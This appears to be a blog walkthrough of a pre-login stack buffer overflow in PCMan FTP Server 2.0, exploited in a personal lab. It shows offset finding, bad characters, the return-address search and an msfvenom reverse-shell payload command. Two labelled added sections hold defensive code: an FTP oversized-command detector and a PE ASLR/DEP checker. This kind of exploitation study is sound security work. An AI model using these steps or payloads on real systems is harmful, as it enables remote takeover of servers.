PCMan FTP Server 2.0 — Remote Buffer Overflow without login

Mahmoud NourEldin
5 min read · Aug 8, 2024


“As a practice for me to test my knowledge of exploitation, I decided to find a vulnerable version of a program that has exploits on exploit-db and find another way to exploit it.”

Assalamu Alaikum, and welcome back. Yes, it’s different now: besides my experience in web pentesting and malware analysis, I can now exploit any BOF vulnerability on the Windows platform, including bypassing ASLR and DEP.

[This is not a full article; it just shows how to derive another exploit from an existing one.]

I won’t explain what a BOF vulnerability is or how to exploit it on Windows (which is more difficult and challenging than on Linux); you can find that on the Internet for free. Here, I’m going to show you how to find your own exploit. [resources at the end of the article]

Now that you have learned the BOF vulnerability and need to find your own exploit, how?

For me, I went to the exploit-db website, searched for “Overflow” and found a vulnerable program called “PCMan FTP Server version 2.0”; Waqas Ahmed Faroouqi had found a remote BOF vulnerability in the “pwd” command.

Figure(1): The latest exploits for BOF as of 8/8/2024

If we look at it, we find that the exploit is very simple but requires being logged in to succeed, so let’s try to find an exploit without login :))))))), can we?

figure(2): source: PCMan FTP Server 2.0 — ‘pwd’ Remote Buffer Overflow — Windows remote Exploit (exploit-db.com)

Let’s test everything in our own lab: download the vulnerable software, set it up in your own Windows VM, and open your own Linux VM [or any testing lab you want].

figure(3): my own lab for testing BOF vulnerability

First, understand the behavior of the program before testing:

figure(4): it has anonymous login

Ok, let’s build our script to connect to the server:

import socket

host = "192.168.56.102"  # the vulnerable remote host (lab VM)
port = 21                # FTP control channel

buf = b"test"  # harmless test payload, sent before any login

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buf)
print(s.recv(1024))  # print whatever the server answers
s.close()
figure(5): the output of the script

Ok, now let’s test and make some noise:

But first, attach the FTP server to your debugger:

figure(6): attaching the ftp server to immunity debugger

Wow, it was just a random try :)))))

We successfully crashed the software; I just picked the number 5000 randomly :))))

figure(7): crashing the software
figure(8): EIP and the Stack have our buffer

Ok, we found our first exploit: PCMan FTP Server 2.0 — Denial of Service without login.
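From the defender's side, the interesting fact so far is that a single unauthenticated control-channel line of a few thousand bytes is enough to crash the service. The following script is an added example (not part of the original post or of the PCMan project) showing how to flag that pattern in captured client-to-server FTP bytes: it splits the stream on CRLF, tracks whether a USER/PASS pair has been seen, and reports any command line longer than a policy threshold. The sessions, client addresses and the 512-byte threshold are constructed assumptions for the demo, not values from the article.

```python
from dataclasses import dataclass

# Assumed policy threshold (not from the article): a legitimate FTP control-channel
# line is a short verb plus an argument; anything near the 2007-byte offset the
# article reports is far outside normal use.
MAX_CMD_LEN = 512

# Constructed sample traffic: one benign session, one unauthenticated blob with no
# line terminator at all (mirroring the crash input above), and one oversized
# PWD argument sent after login.
SAMPLE_SESSIONS = {
    "10.0.0.5": b"USER anonymous\r\nPASS guest@\r\nPWD\r\nQUIT\r\n",
    "10.0.0.9": b"A" * 5000,
    "10.0.0.12": b"USER anonymous\r\nPASS guest@\r\nPWD " + b"B" * 3000 + b"\r\n",
}


@dataclass
class Alert:
    client: str
    line_no: int
    length: int
    authenticated: bool
    verb: str


def scan_ftp_session(client: str, data: bytes, max_len: int = MAX_CMD_LEN) -> list:
    """Walk one client's control-channel bytes and flag oversized command lines.

    Authentication state is tracked from USER/PASS so each alert records whether
    the oversized line arrived before login. A trailing chunk with no CRLF is
    still treated as a command, because the crash input had no terminator.
    """
    alerts = []
    authenticated = False
    for idx, raw in enumerate(data.split(b"\r\n"), start=1):
        if not raw:
            continue
        # first token, truncated so a 5000-byte line does not become a 5000-byte verb
        verb = raw.split(b" ", 1)[0][:8].decode("ascii", "replace").upper()
        if len(raw) > max_len:
            alerts.append(Alert(client, idx, len(raw), authenticated, verb))
        # Simplified state: PASS marks a login attempt; a real monitor would
        # confirm with the server's 230 reply before treating the client as logged in.
        if verb == "PASS":
            authenticated = True
    return alerts


def scan_all(sessions=SAMPLE_SESSIONS, max_len: int = MAX_CMD_LEN) -> list:
    """Run the scanner over every captured session and collect the alerts."""
    out = []
    for client, data in sessions.items():
        out.extend(scan_ftp_session(client, data, max_len))
    return out


if __name__ == "__main__":
    for a in scan_all():
        stage = "pre-auth" if not a.authenticated else "post-auth"
        print(f"{a.client} line {a.line_no}: {a.length}-byte {a.verb} command ({stage})")
```

Run as-is it reports two alerts: the 5000-byte unauthenticated blob from 10.0.0.9 and the 3004-byte PWD line from 10.0.0.12. The pre-auth flag is what matters for this bug, since it marks input that reaches the vulnerable parser before any credential check.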

Let’s reproduce it to turn it into a successful buffer overflow exploit.

Find the offset of the EIP, then find a JMP ESP, then generate your reverse shellcode, but we forgot something.

$/usr/share/metasploit-framework/tools/exploit/pattern_create -l 5000

After sending the pattern to the server, we find the EIP holds this value:

figure(9): Finding the location of the EIP

We found the EIP at offset 2007, the same as in the exploit on the exploit-db website:

figure(10): we found the same vuln without login

So, if we copy-paste that code and change the size and the return address, it should work in our case, but let me make it myself.

Let’s make sure we control the EIP:

figure(11): Controlling the EIP

Let’s find the badchars:

figure(12): \x0a is the second bad char

The second bad char we found is “\x0a”; as you can see in the figure, it shows up as \x00 rather than \x0a. Let’s remove it and send again.

figure(13): \x0d is the third bad char

The third bad char is “\x0d”, as expected; “\x00, \x0a, \x0d” are the usual bad chars for web servers and sometimes for FTP servers.

After removing the bad chars and sending the exploit again, we didn’t see any more bad chars:

figure(14): no bad chars again

Which is the same result here:

We are on the right track.

figure(15): the same result for the same vulnerability

Let’s find the JMP ESP with mona, but first we need to know the modules:

figure(16): Modules of PCMan FTP Server

We have 2 modules that are not protected by ASLR or DEP, plus the program executable itself.

But we didn’t find any jump to ESP in those:

figure(17): no JMP ESP in Blowfish.dll or Lang.dll

Only in the server executable itself, where all the addresses contain the “\x00” bad char as expected; that’s why we prefer not to use the executable’s addresses in our exploit:

figure(18): JMP ESP only in the executable itself

That’s why the researcher used the Windows DLL USER32.dll as the module for the return address.

figure(19): the return address used from USER32.dll

That’s a problem, guys: in the real world, you can’t hack the victim with this solution because Windows DLLs are rebased (ASLR), which means their base address changes every time the machine restarts.

Your exploit is not reliable; we need a solution for it!! Comment now.
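The whole reliability problem above comes down to which modules opted into ASLR and DEP: the two bundled DLLs did not, while USER32.dll did. Those opt-ins are plain header bits, so a defender can audit them without a debugger. The script below is an added example (not the post's or the PCMan project's code) that reads the COFF and optional headers of a PE file and reports the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (ASLR) and IMAGE_DLLCHARACTERISTICS_NX_COMPAT (DEP) flags, plus whether relocations were stripped, which also prevents rebasing. The `build_test_pe` helper fabricates a minimal, non-loadable header purely so the parser can be exercised offline; it is an assumption of this example, not something the article provides.

```python
import struct

# Flag values from the PE/COFF specification (winnt.h).
DYNAMIC_BASE = 0x0040     # DllCharacteristics: ASLR opt-in, image may be rebased at load
NX_COMPAT = 0x0100        # DllCharacteristics: DEP-compatible image
RELOCS_STRIPPED = 0x0001  # COFF Characteristics: no relocations, so it cannot be rebased


def pe_mitigations(data: bytes) -> dict:
    """Report ASLR/DEP opt-ins from a PE image's headers.

    Raises ValueError for anything that is not a well-formed PE header.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes)
    (_, _, _, _, _, opt_size, file_chars) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if opt_size < 72 or len(data) < opt + 72:
        raise ValueError("optional header too short")
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    # DllCharacteristics sits at offset 70 of the optional header in both PE32 and PE32+
    (dll_chars,) = struct.unpack_from("<H", data, opt + 70)
    relocs_stripped = bool(file_chars & RELOCS_STRIPPED)
    return {
        "pe32plus": magic == 0x20B,
        # ASLR only takes effect if the image can actually be relocated
        "aslr": bool(dll_chars & DYNAMIC_BASE) and not relocs_stripped,
        "dep": bool(dll_chars & NX_COMPAT),
        "relocs_stripped": relocs_stripped,
    }


def build_test_pe(dll_chars: int, file_chars: int = 0, magic: int = 0x10B) -> bytes:
    """Construct a minimal, non-loadable PE header for testing this parser.

    Only the fields pe_mitigations reads are populated; everything else is zero.
    """
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header follows the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 96, file_chars)
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 70, dll_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    import sys
    # Usage: python pe_mitigations.py <file.exe|file.dll> ...
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(path, pe_mitigations(f.read()))
```

Pointed at the server's install directory, a module that comes back with `aslr: False` is exactly the kind of predictable-address component that mona highlighted in figure(16); vendors ship the fix by linking with dynamic base and NX enabled.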

So, search for “call ESP” in “USER32.dll”, put the address of that call as the return address in EIP, then create the shellcode as usual with Metasploit and start your listener:

$msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
figure(20): We hit the return address successfully

And we receive the shell successfully:

figure(21): The final dance

Now, our final exploit is here:

TamatahYT/PCManFTP2.0 (github.com)


Written by Mahmoud NourEldin

Threat Researcher and Malware Analyst.
